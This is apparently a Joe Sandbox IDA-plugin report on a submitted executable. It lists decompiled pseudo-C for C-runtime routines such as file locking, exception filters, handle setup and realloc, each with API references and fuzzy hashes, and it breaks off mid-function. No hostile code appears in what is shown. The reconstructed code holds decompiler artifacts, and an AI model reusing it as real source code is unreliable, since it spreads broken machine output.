                        • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00D71076
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                        • String ID:
                        • API String ID: 3693343133-0
                        • Opcode ID: ae94b8caabbd11a1100054720cb4d81737bf7c89db1a8a54e05e78771a0cc08d
                        • Instruction ID: c49b18dd87d4ba4bac98c936af6f26b7ddc41a12926152908871bb55bd3dbe6c
                        • Opcode Fuzzy Hash: ae94b8caabbd11a1100054720cb4d81737bf7c89db1a8a54e05e78771a0cc08d
                        • Instruction Fuzzy Hash: 730128B6A043047BE7202B799C4BF9F7F5CDB41768F104A51FA09AB1C2FAF499418274
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 89%
                        			E00D71490(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t16;
                        				intOrPtr _t19;
                        				intOrPtr _t29;
                        				void* _t32;
                        
                        				_push(0xc);
                        				_push(0xd82170);
                        				E00D72400(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                        				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                        					L6:
                        					_t16 = 0;
                        				} else {
                        					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                        					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                        						E00D71F5E(_t31);
                        						 *((intOrPtr*)(_t32 - 4)) = 0;
                        						_t19 = E00D712B0( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                        						_t29 = _t19;
                        						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                        						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                        						E00D71519(_t31);
                        						_t16 = _t29;
                        					} else {
                        						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                        							E00D71530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                        						}
                        						 *((intOrPtr*)(E00D71CC3())) = 0x16;
                        						E00D71E89();
                        						goto L6;
                        					}
                        				}
                        				return E00D72445(_t16);
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: e65e210cb1e5fc26190519ed9606a05cc56b75f3a0cfc4224d5a238c380a6770
                        • Instruction ID: 930d64823913591ba2cb30b40f0cf77aa059c6681792f016a38bb6c3d4addd7a
                        • Opcode Fuzzy Hash: e65e210cb1e5fc26190519ed9606a05cc56b75f3a0cfc4224d5a238c380a6770
                        • Instruction Fuzzy Hash: D6017139800208ABCF22AFAD9C0699E7AB1EF90368F14C315F96C56151F7318A21DBB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 25%
                        			E00D711D1(intOrPtr _a4, intOrPtr _a8) {
                        				void* __ebp;
                        				void* _t3;
                        				void* _t4;
                        				void* _t5;
                        				void* _t6;
                        				void* _t9;
                        
                        				_push(0x40);
                        				_push(_a8);
                        				_push(_a4);
                        				_t3 = E00D711E6(_t4, _t5, _t6, _t9); // executed
                        				return _t3;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: 87e28d9a26eeb6ddf06cfc0e27bb45b0b76cd59676309e570496b52e6bb1e4da
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 3EB0927644420C77CE012AC6EC02A493B29AB40760F808020FF0C1C162A673A66496AA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D743CC(struct _EXCEPTION_POINTERS* _a4) {
                        
                        				SetUnhandledExceptionFilter(0);
                        				return UnhandledExceptionFilter(_a4);
                        			}

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D71E2A,?,?,?,00000000), ref: 00D743D1
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00D743DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 2685d668f8f15a01c0bff2c28d403f6490e5e608f4d31061c273c7bc20eff011
                        • Instruction ID: b77b0a889ee8e6e213fc85b3394ec33d9f091a02d7b03c09e36335f46bfb7274
                        • Opcode Fuzzy Hash: 2685d668f8f15a01c0bff2c28d403f6490e5e608f4d31061c273c7bc20eff011
                        • Instruction Fuzzy Hash: 63B09235044308ABCB002B91EC0EB483F28EB18656FC004A0FA0D84260AB7254908AA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D7439B(_Unknown_base(*)()* _a4) {
                        
                        				return SetUnhandledExceptionFilter(_a4);
                        			}



                        0x00d743a8

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00D73447,00D733FC), ref: 00D743A1
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 3344b3564513e55897b67c1b6b0db9655e024e0758011c4ca03d5251b0129fcb
                        • Instruction ID: 82d9fdd46c0ab32070d8104ef543899fd5559cba8d385d8e8e59a16f1cc450d4
                        • Opcode Fuzzy Hash: 3344b3564513e55897b67c1b6b0db9655e024e0758011c4ca03d5251b0129fcb
                        • Instruction Fuzzy Hash: 64A0123000030CA78A001B41EC094443F1CD6041507800060F80C40120973254504591
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E00D738A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t82;
                        				signed int _t86;
                        				long _t90;
                        				void* _t91;
                        				signed int _t94;
                        				signed int _t98;
                        				signed int _t99;
                        				signed char _t103;
                        				signed int _t105;
                        				intOrPtr _t106;
                        				intOrPtr* _t109;
                        				signed char _t111;
                        				long _t119;
                        				intOrPtr _t129;
                        				signed int _t133;
                        				void* _t135;
                        				signed int _t138;
                        				void** _t139;
                        				signed int _t141;
                        				signed int _t142;
                        				signed int _t143;
                        				signed int _t147;
                        				signed int _t149;
                        				void* _t150;
                        				signed int _t154;
                        				void* _t155;
                        				void* _t156;
                        
                        				_push(0x64);
                        				_push(0xd82260);
                        				E00D72400(__ebx, __edi, __esi);
                        				E00D7442F(0xb);
                        				 *((intOrPtr*)(_t155 - 4)) = 0;
                        				_push(0x40);
                        				_t141 = 0x20;
                        				_push(_t141);
                        				_t82 = E00D74869();
                        				_t133 = _t82;
                        				 *(_t155 - 0x24) = _t133;
                        				if(_t133 != 0) {
                        					 *0xd84848 = _t82;
                        					 *0xd850e4 = _t141;
                        					while(1) {
                        						__eflags = _t133 - 0x800 + _t82;
                        						if(_t133 >= 0x800 + _t82) {
                        							break;
                        						}
                        						 *((short*)(_t133 + 4)) = 0xa00;
                        						 *_t133 =  *_t133 | 0xffffffff;
                        						 *((intOrPtr*)(_t133 + 8)) = 0;
                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                        						 *((short*)(_t133 + 0x25)) = 0xa0a;
                        						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                        						 *((char*)(_t133 + 0x34)) = 0;
                        						_t133 = _t133 + 0x40;
                        						 *(_t155 - 0x24) = _t133;
                        						_t82 =  *0xd84848; // 0x13143d8
                        					}
                        					GetStartupInfoW(_t155 - 0x74);
                        					__eflags =  *((short*)(_t155 - 0x42));
                        					if( *((short*)(_t155 - 0x42)) == 0) {
                        						L27:
                        						_t129 = 0xfffffffe;
                        						L28:
                        						_t142 = 0;
                        						__eflags = 0;
                        						while(1) {
                        							 *(_t155 - 0x2c) = _t142;
                        							__eflags = _t142 - 3;
                        							if(_t142 >= 3) {
                        								break;
                        							}
                        							_t147 = (_t142 << 6) +  *0xd84848;
                        							 *(_t155 - 0x24) = _t147;
                        							__eflags =  *_t147 - 0xffffffff;
                        							if( *_t147 == 0xffffffff) {
                        								L33:
                        								 *(_t147 + 4) = 0x81;
                        								__eflags = _t142;
                        								if(_t142 != 0) {
                        									_t65 = _t142 - 1; // -1
                        									asm("sbb eax, eax");
                        									_t90 =  ~_t65 + 0xfffffff5;
                        									__eflags = _t90;
                        								} else {
                        									_t90 = 0xfffffff6;
                        								}
                        								_t91 = GetStdHandle(_t90);
                        								 *(_t155 - 0x1c) = _t91;
                        								__eflags = _t91 - 0xffffffff;
                        								if(_t91 == 0xffffffff) {
                        									L45:
                        									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                        									 *_t147 = _t129;
                        									_t94 =  *0xd86100;
                        									__eflags = _t94;
                        									if(_t94 != 0) {
                        										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                        									}
                        									goto L47;
                        								} else {
                        									__eflags = _t91;
                        									if(_t91 == 0) {
                        										goto L45;
                        									}
                        									_t98 = GetFileType(_t91);
                        									__eflags = _t98;
                        									if(_t98 == 0) {
                        										goto L45;
                        									}
                        									 *_t147 =  *(_t155 - 0x1c);
                        									_t99 = _t98 & 0x000000ff;
                        									__eflags = _t99 - 2;
                        									if(_t99 != 2) {
                        										__eflags = _t99 - 3;
                        										if(_t99 != 3) {
                        											L44:
                        											_t71 = _t147 + 0xc; // -14174268
                        											E00D740A2(_t71, 0xfa0, 0);
                        											_t156 = _t156 + 0xc;
                        											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                        											L47:
                        											_t142 = _t142 + 1;
                        											continue;
                        										}
                        										_t103 =  *(_t147 + 4) | 0x00000008;
                        										__eflags = _t103;
                        										L43:
                        										 *(_t147 + 4) = _t103;
                        										goto L44;
                        									}
                        									_t103 =  *(_t147 + 4) | 0x00000040;
                        									goto L43;
                        								}
                        							}
                        							__eflags =  *_t147 - _t129;
                        							if( *_t147 == _t129) {
                        								goto L33;
                        							}
                        							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                        							goto L47;
                        						}
                        						 *((intOrPtr*)(_t155 - 4)) = _t129;
                        						E00D73B53();
                        						_t86 = 0;
                        						__eflags = 0;
                        						L49:
                        						return E00D72445(_t86);
                        					}
                        					_t105 =  *(_t155 - 0x40);
                        					__eflags = _t105;
                        					if(_t105 == 0) {
                        						goto L27;
                        					}
                        					_t135 =  *_t105;
                        					 *(_t155 - 0x1c) = _t135;
                        					_t106 = _t105 + 4;
                        					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                        					 *(_t155 - 0x20) = _t106 + _t135;
                        					__eflags = _t135 - 0x800;
                        					if(_t135 >= 0x800) {
                        						_t135 = 0x800;
                        						 *(_t155 - 0x1c) = 0x800;
                        					}
                        					_t149 = 1;
                        					__eflags = 1;
                        					 *(_t155 - 0x30) = 1;
                        					while(1) {
                        						__eflags =  *0xd850e4 - _t135; // 0x20
                        						if(__eflags >= 0) {
                        							break;
                        						}
                        						_t138 = E00D74869(_t141, 0x40);
                        						 *(_t155 - 0x24) = _t138;
                        						__eflags = _t138;
                        						if(_t138 != 0) {
                        							0xd84848[_t149] = _t138;
                        							 *0xd850e4 =  *0xd850e4 + _t141;
                        							__eflags =  *0xd850e4;
                        							while(1) {
                        								__eflags = _t138 - 0x800 + 0xd84848[_t149];
                        								if(_t138 >= 0x800 + 0xd84848[_t149]) {
                        									break;
                        								}
                        								 *((short*)(_t138 + 4)) = 0xa00;
                        								 *_t138 =  *_t138 | 0xffffffff;
                        								 *((intOrPtr*)(_t138 + 8)) = 0;
                        								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                        								 *((short*)(_t138 + 0x25)) = 0xa0a;
                        								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                        								 *((char*)(_t138 + 0x34)) = 0;
                        								_t138 = _t138 + 0x40;
                        								 *(_t155 - 0x24) = _t138;
                        							}
                        							_t149 = _t149 + 1;
                        							 *(_t155 - 0x30) = _t149;
                        							_t135 =  *(_t155 - 0x1c);
                        							continue;
                        						}
                        						_t135 =  *0xd850e4; // 0x20
                        						 *(_t155 - 0x1c) = _t135;
                        						break;
                        					}
                        					_t143 = 0;
                        					 *(_t155 - 0x2c) = 0;
                        					_t129 = 0xfffffffe;
                        					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                        					_t139 =  *(_t155 - 0x20);
                        					while(1) {
                        						__eflags = _t143 - _t135;
                        						if(_t143 >= _t135) {
                        							goto L28;
                        						}
                        						_t150 =  *_t139;
                        						__eflags = _t150 - 0xffffffff;
                        						if(_t150 == 0xffffffff) {
                        							L22:
                        							_t143 = _t143 + 1;
                        							 *(_t155 - 0x2c) = _t143;
                        							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                        							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                        							_t139 =  &(_t139[1]);
                        							 *(_t155 - 0x20) = _t139;
                        							continue;
                        						}
                        						__eflags = _t150 - _t129;
                        						if(_t150 == _t129) {
                        							goto L22;
                        						}
                        						_t111 =  *_t109;
                        						__eflags = _t111 & 0x00000001;
                        						if((_t111 & 0x00000001) == 0) {
                        							goto L22;
                        						}
                        						__eflags = _t111 & 0x00000008;
                        						if((_t111 & 0x00000008) != 0) {
                        							L20:
                        							_t154 = ((_t143 & 0x0000001f) << 6) + 0xd84848[_t143 >> 5];
                        							 *(_t155 - 0x24) = _t154;
                        							 *_t154 =  *_t139;
                        							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                        							_t37 = _t154 + 0xc; // 0xd
                        							E00D740A2(_t37, 0xfa0, 0);
                        							_t156 = _t156 + 0xc;
                        							_t38 = _t154 + 8;
                        							 *_t38 =  *(_t154 + 8) + 1;
                        							__eflags =  *_t38;
                        							_t139 =  *(_t155 - 0x20);
                        							L21:
                        							_t135 =  *(_t155 - 0x1c);
                        							goto L22;
                        						}
                        						_t119 = GetFileType(_t150);
                        						_t139 =  *(_t155 - 0x20);
                        						__eflags = _t119;
                        						if(_t119 == 0) {
                        							goto L21;
                        						}
                        						goto L20;
                        					}
                        					goto L28;
                        				}
                        				_t86 = E00D72600(_t155, 0xd83400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                        				goto L49;
                        			}































                        APIs
                        • __lock.LIBCMT ref: 00D738B6
                          • Part of subcall function 00D7442F: __mtinitlocknum.LIBCMT ref: 00D74441
                          • Part of subcall function 00D7442F: EnterCriticalSection.KERNEL32(00000000,?,00D737AB,0000000D), ref: 00D7445A
                        • __calloc_crt.LIBCMT ref: 00D738C7
                          • Part of subcall function 00D74869: __calloc_impl.LIBCMT ref: 00D74878
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D738E2
                        • GetStartupInfoW.KERNEL32(?,00D82260,00000064,00D71654,00D82190,00000014), ref: 00D7393B
                        • __calloc_crt.LIBCMT ref: 00D73986
                        • GetFileType.KERNEL32(00000001), ref: 00D739CF
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2772871689-0
                        • Opcode ID: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction ID: 3b9319270afad973bf9a4d6e91ec7af8224983e9556176e32cd70dba36fc4022
                        • Opcode Fuzzy Hash: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction Fuzzy Hash: FD81B2719043458FDB14CF68C8416A9BBF0EF19324B28826ED4AAEB391E734D942DB74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00D73815(void* __ebx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				void* _t3;
                        				intOrPtr _t6;
                        				long _t14;
                        				long* _t27;
                        
                        				E00D71890(_t3);
                        				if(E00D74560() != 0) {
                        					_t6 = E00D74001(E00D735A6);
                        					 *0xd8350c = _t6;
                        					__eflags = _t6 - 0xffffffff;
                        					if(_t6 == 0xffffffff) {
                        						goto L1;
                        					} else {
                        						_t27 = E00D74869(1, 0x3bc);
                        						__eflags = _t27;
                        						if(_t27 == 0) {
                        							L6:
                        							E00D7388B();
                        							__eflags = 0;
                        							return 0;
                        						} else {
                        							__eflags = E00D7405D( *0xd8350c, _t27);
                        							if(__eflags == 0) {
                        								goto L6;
                        							} else {
                        								_push(0);
                        								_push(_t27);
                        								E00D73762(__ebx, __edi, _t27, __eflags);
                        								_t14 = GetCurrentThreadId();
                        								_t27[1] = _t27[1] | 0xffffffff;
                        								 *_t27 = _t14;
                        								__eflags = 1;
                        								return 1;
                        							}
                        						}
                        					}
                        				} else {
                        					L1:
                        					E00D7388B();
                        					return 0;
                        				}
                        			}









                        APIs
                        • __init_pointers.LIBCMT ref: 00D73815
                          • Part of subcall function 00D71890: RtlEncodePointer.NTDLL(00000000,?,00D7381A,00D7163A,00D82190,00000014), ref: 00D71893
                          • Part of subcall function 00D71890: __initp_misc_winsig.LIBCMT ref: 00D718AE
                          • Part of subcall function 00D71890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D74117
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D7412B
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D7413E
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D74151
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D74164
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D74177
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D7418A
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D7419D
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D741B0
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D741C3
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D741D6
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D741E9
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D741FC
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D7420F
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D74222
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D74235
                        • __mtinitlocks.LIBCMT ref: 00D7381A
                        • __mtterm.LIBCMT ref: 00D73823
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D7447A
                          • Part of subcall function 00D7388B: _free.LIBCMT ref: 00D74481
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00D83558,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D744A3
                        • __calloc_crt.LIBCMT ref: 00D73848
                        • __initptd.LIBCMT ref: 00D7386A
                        • GetCurrentThreadId.KERNEL32 ref: 00D73871
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 3567560977-0
                        • Opcode ID: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction ID: 162fec928960f12b415d3688e2dbec891a10202e2c4c5d94db79b42cea7b531f
                        • Opcode Fuzzy Hash: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction Fuzzy Hash: B9F096325193215EE32977787C1368A2A84CF01B30B24C76DF46CD81D2FF218A4156B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E00D77452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                        				void* _t7;
                        				void* _t8;
                        				intOrPtr* _t9;
                        				intOrPtr* _t12;
                        				void* _t20;
                        				long _t31;
                        
                        				if(_a4 != 0) {
                        					_t31 = _a8;
                        					if(_t31 != 0) {
                        						_push(__ebx);
                        						while(_t31 <= 0xffffffe0) {
                        							if(_t31 == 0) {
                        								_t31 = _t31 + 1;
                        							}
                        							_t7 = HeapReAlloc( *0xd84834, 0, _a4, _t31);
                        							_t20 = _t7;
                        							if(_t20 != 0) {
                        								L17:
                        								_t8 = _t20;
                        							} else {
                        								if( *0xd84830 == _t7) {
                        									_t9 = E00D71CC3();
                        									 *_t9 = E00D71CD6(GetLastError());
                        									goto L17;
                        								} else {
                        									if(E00D71741(_t7, _t31) == 0) {
                        										_t12 = E00D71CC3();
                        										 *_t12 = E00D71CD6(GetLastError());
                        										L12:
                        										_t8 = 0;
                        									} else {
                        										continue;
                        									}
                        								}
                        							}
                        							goto L14;
                        						}
                        						E00D71741(_t6, _t31);
                        						 *((intOrPtr*)(E00D71CC3())) = 0xc;
                        						goto L12;
                        					} else {
                        						E00D74831(_a4);
                        						_t8 = 0;
                        					}
                        					L14:
                        					return _t8;
                        				} else {
                        					return E00D7113F(__ebx, __edx, __edi, _a8);
                        				}
                        			}










                        APIs
                        • _malloc.LIBCMT ref: 00D7745E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                        • _free.LIBCMT ref: 00D77471
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 6e49eccdde4053e6220a60cdde84c36078fee1608ba10d277d21da59e4882402
                        • Instruction ID: c5849b6f846d88d016a79cef9a64116457cb18d21cf60a451bec5e216a458715
                        • Opcode Fuzzy Hash: 6e49eccdde4053e6220a60cdde84c36078fee1608ba10d277d21da59e4882402
                        • Instruction Fuzzy Hash: 52117731909625ABCB213FB8AC456597FD4EF04368B24CE2AF94CDA351FA70884086B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D791C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				intOrPtr _v12;
                        				signed int _v20;
                        				signed int _t35;
                        				int _t38;
                        				signed int _t41;
                        				int _t42;
                        				intOrPtr* _t44;
                        				int _t47;
                        				short* _t49;
                        				intOrPtr _t50;
                        				intOrPtr _t54;
                        				int _t55;
                        				signed int _t59;
                        				char* _t62;
                        
                        				_t62 = _a8;
                        				if(_t62 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t50 = _a12;
                        				if(_t50 == 0) {
                        					goto L5;
                        				}
                        				if( *_t62 != 0) {
                        					E00D74BFC( &_v20, _a16);
                        					_t35 = _v20;
                        					__eflags =  *(_t35 + 0xa8);
                        					if( *(_t35 + 0xa8) != 0) {
                        						_t38 = E00D7917B( *_t62 & 0x000000ff,  &_v20);
                        						__eflags = _t38;
                        						if(_t38 == 0) {
                        							__eflags = _a4;
                        							_t41 = _v20;
                        							_t59 = 1;
                        							_t28 = _t41 + 4; // 0x840ffff8
                        							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                        							__eflags = _t42;
                        							if(_t42 != 0) {
                        								L21:
                        								__eflags = _v8;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									_t31 = _t54 + 0x70;
                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
